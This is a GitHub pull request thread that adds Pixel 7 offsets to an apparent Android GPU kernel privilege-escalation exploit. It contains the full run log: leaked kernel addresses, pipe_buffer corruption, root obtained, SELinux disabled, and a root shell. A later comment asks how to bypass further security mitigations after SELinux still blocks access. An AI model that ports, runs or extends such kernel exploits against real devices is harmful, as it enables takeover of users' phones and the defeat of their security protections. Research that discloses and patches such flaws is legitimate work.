Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Pixel 7 config. #2

Merged
merged 1 commit into from
Mar 15, 2024
Merged

Add Pixel 7 config. #2

merged 1 commit into from
Mar 15, 2024

Conversation

m4b4
Copy link

@m4b4 m4b4 commented Mar 14, 2024

I just confirmed that the offsets for the Pixel 7 Pro SPL Nov-23 match with the offsets on my Pixel 7 (panther:14/UP1A.231105.003/11010452).

panther:/ $ /data/local/tmp/gpu_exploit
[+] Target device: 'google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys' 0xd10203ffd503233f 0xa9027bfdf800865e
[+] Got the kcpu_id (0) kernel address = 0xffffff8927434000  from context (0x0)
[+] Got the kcpu_id (255) kernel address = 0xffffff8030358000  from context (0xff)
[+] Found corrupted pipe with size 0xfff
[+] SUCCESS! we have a fake pipe_buffer (0)!
10 40 43 27 89 FF FF FF  10 40 43 27 89 FF FF FF  | .@C'.....@C'....
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
00 10 74 13 C0 FF FF FF  00 00 00 00 00 00 00 00  | ..t.............
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
[+] Freeing kcpu_id = 0 (0xffffff8927434000)[+] Allocating 61 pipes with 256 slots
[+] Successfully overlapped the kcpuqueue object with a pipe buffer
00 13 A0 00 FF FF FF FF  00 00 00 00 30 00 00 00  | ............0...
28 CD 57 06 E9 FF FF FF  10 00 00 00 00 00 00 00  | (.W.............
00 00 00 00 00 00 00 00                           | ........
[+] pipe_buffer {.page = 0xffffffff00a01300, .offset = 0x0, .len = 0x30, ops = 0xffffffe90657cd28}
[+] kernel base = 0xffffffe904210000, kthreadd_task = 0xffffff8003595c80 selinux_state = 0xffffffe907395970
[+] Found our own task struct 0xffffff8848a05c80
[+] Successfully got root: getuid() = 0 getgid() = 0
[+] Successfully disabled SELinux
[+] Cleanup  ... OK
panther:/ # whoami
root

@0x36 0x36 merged commit 3457395 into 0x36:main Mar 15, 2024
@0x36
Copy link
Owner

0x36 commented Mar 15, 2024

Thanks!

@marcelbthk
Copy link
Contributor

marcelbthk commented Apr 12, 2024

@0x36 It was later I realized SELinux is seemingly not fully disabled for me:

panther:/ # whoami
root
panther:/data/local/tmp # ls
ls: .: Permission denied
1|panther:/data/local/tmp # getenforce
Permissive

Out of the top of your head, can you think of additional security mitigations that might need to be bypassed? I'm currently investigating this but without any success. I verified the uid is set to 0 and also the enforcing flag in selinux_state is zeroed out.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants